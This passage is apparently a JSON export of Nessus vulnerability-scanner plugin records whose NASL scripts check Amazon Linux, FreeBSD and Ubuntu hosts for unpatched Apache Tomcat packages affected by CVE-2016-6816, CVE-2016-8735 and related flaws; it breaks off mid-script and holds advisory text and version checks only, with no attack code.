"p-cpe:/a:amazon:linux:tomcat6-lib", "p-cpe:/a:amazon:linux:tomcat6-servlet-2.5-api", "p-cpe:/a:amazon:linux:tomcat6-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-776.NASL", "href": "https://www.tenable.com/plugins/nessus/95896", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-776.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95896);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\");\n script_xref(name:\"ALAS\", value:\"2016-776\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Amazon Linux AMI : tomcat6 (ALAS-2016-776)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to\npermitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in\nJmxRemoteLifecycleListener\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2016-776.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat6' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-el-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-admin-webapps-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-docs-webapp-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-el-2.1-api-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-javadoc-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-jsp-2.1-api-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-lib-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-servlet-2.5-api-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-webapps-6.0.48-1.8.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat6 / tomcat6-admin-webapps / tomcat6-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:44:09", "description": "CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat8 (ALAS-2016-778)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat8", "p-cpe:/a:amazon:linux:tomcat8-admin-webapps", "p-cpe:/a:amazon:linux:tomcat8-docs-webapp", "p-cpe:/a:amazon:linux:tomcat8-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat8-javadoc", "p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat8-lib", "p-cpe:/a:amazon:linux:tomcat8-log4j", "p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat8-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-778.NASL", "href": "https://www.tenable.com/plugins/nessus/95898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-778.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95898);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\");\n script_xref(name:\"ALAS\", value:\"2016-778\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Amazon Linux AMI : tomcat8 (ALAS-2016-778)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to\npermitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in\nJmxRemoteLifecycleListener\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2016-778.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat8' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-admin-webapps-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-docs-webapp-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-el-3.0-api-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-javadoc-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-jsp-2.3-api-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-lib-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-log4j-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-servlet-3.1-api-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-webapps-8.0.39-1.67.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat8 / tomcat8-admin-webapps / tomcat8-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:47:42", "description": "The Apache Software Foundation reports :\n\nImportant: Remote Code Execution CVE-2016-8735\n\nImportant: Information Disclosure CVE-2016-6816", "cvss3": {}, "published": "2017-01-10T00:00:00", "type": "nessus", "title": "FreeBSD : tomcat -- multiple vulnerabilities (0b9af110-d529-11e6-ae1b-002590263bf5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:tomcat", "p-cpe:/a:freebsd:freebsd:tomcat7", "p-cpe:/a:freebsd:freebsd:tomcat8", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0B9AF110D52911E6AE1B002590263BF5.NASL", "href": "https://www.tenable.com/plugins/nessus/96364", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96364);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"FreeBSD : tomcat -- multiple vulnerabilities (0b9af110-d529-11e6-ae1b-002590263bf5)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Apache Software Foundation reports :\n\nImportant: Remote Code Execution CVE-2016-8735\n\nImportant: Information Disclosure CVE-2016-6816\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=214599\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.48\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.73\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.39\");\n # https://vuxml.freebsd.org/freebsd/0b9af110-d529-11e6-ae1b-002590263bf5.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f94679a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"tomcat<6.0.48\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"tomcat7<7.0.73\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"tomcat8<8.0.39\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-21T15:34:20", "description": "The remote Ubuntu 16.04 LTS host has a package installed that is affected by multiple vulnerabilities as referenced in the USN-4557-1 advisory.\n\n - The Realm implementations in Apache Tomcat versions 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder.\n (CVE-2016-0762)\n\n - In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 a malicious web application was able to bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications. (CVE-2016-5018)\n\n - When a SecurityManager is configured, a web application's ability to read system properties should be controlled by the SecurityManager. In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70, 6.0.0 to 6.0.45 the system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible. (CVE-2016-6794)\n\n - A malicious web application running on Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 was able to bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet. (CVE-2016-6796)\n\n - The ResourceLinkFactory implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not limit web application access to global JNDI resources to those resources explicitly linked to the web application. Therefore, it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not. (CVE-2016-6797)\n\n - The code in Apache Tomcat 9.0.0.M1 to 9.0.0.M11, 8.5.0 to 8.5.6, 8.0.0.RC1 to 8.0.38, 7.0.0 to 7.0.72, and 6.0.0 to 6.0.47 that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own. (CVE-2016-6816)\n\n - Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types. (CVE-2016-8735)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-09-30T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : Tomcat vulnerabilities (USN-4557-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0762", "CVE-2016-3427", "CVE-2016-5018", "CVE-2016-6794", "CVE-2016-6796", "CVE-2016-6797", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2023-10-20T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libservlet2.5-java"], "id": "UBUNTU_USN-4557-1.NASL", "href": "https://www.tenable.com/plugins/nessus/141092", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4557-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141092);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\n \"CVE-2016-0762\",\n \"CVE-2016-5018\",\n \"CVE-2016-6794\",\n \"CVE-2016-6796\",\n \"CVE-2016-6797\",\n \"CVE-2016-6816\",\n \"CVE-2016-8735\"\n );\n script_bugtraq_id(\n 93939,\n 93940,\n 93942,\n 93943,\n 93944,\n 94461,\n 94463\n );\n script_xref(name:\"USN\", value:\"4557-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Ubuntu 16.04 LTS : Tomcat vulnerabilities (USN-4557-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe USN-4557-1 advisory.\n\n - The Realm implementations in Apache Tomcat versions 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to\n 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not process the supplied password if the supplied user\n name did not exist. This made a timing attack possible to determine valid user names. Note that the\n default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder.\n (CVE-2016-0762)\n\n - In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to\n 6.0.45 a malicious web application was able to bypass a configured SecurityManager via a Tomcat utility\n method that was accessible to web applications. (CVE-2016-5018)\n\n - When a SecurityManager is configured, a web application's ability to read system properties should be\n controlled by the SecurityManager. In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to\n 8.0.36, 7.0.0 to 7.0.70, 6.0.0 to 6.0.45 the system property replacement feature for configuration files\n could be used by a malicious web application to bypass the SecurityManager and read system properties that\n should not be visible. (CVE-2016-6794)\n\n - A malicious web application running on Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to\n 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 was able to bypass a configured SecurityManager via\n manipulation of the configuration parameters for the JSP Servlet. (CVE-2016-6796)\n\n - The ResourceLinkFactory implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to\n 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not limit web application access to global JNDI resources\n to those resources explicitly linked to the web application. Therefore, it was possible for a web\n application to access any global JNDI resource whether an explicit ResourceLink had been configured or\n not. (CVE-2016-6797)\n\n - The code in Apache Tomcat 9.0.0.M1 to 9.0.0.M11, 8.5.0 to 8.5.6, 8.0.0.RC1 to 8.0.38, 7.0.0 to 7.0.72, and\n 6.0.0 to 6.0.47 that parsed the HTTP request line permitted invalid characters. This could be exploited,\n in conjunction with a proxy that also permitted the invalid characters but with a different\n interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker\n could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other\n then their own. (CVE-2016-6816)\n\n - Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39,\n 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can\n reach JMX ports. The issue exists because this listener wasn't updated for consistency with the\n CVE-2016-3427 Oracle patch that affected credential types. (CVE-2016-8735)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4557-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libservlet2.5-java package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8735\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libservlet2.5-java\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2023 Canonical, Inc. / NASL script (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 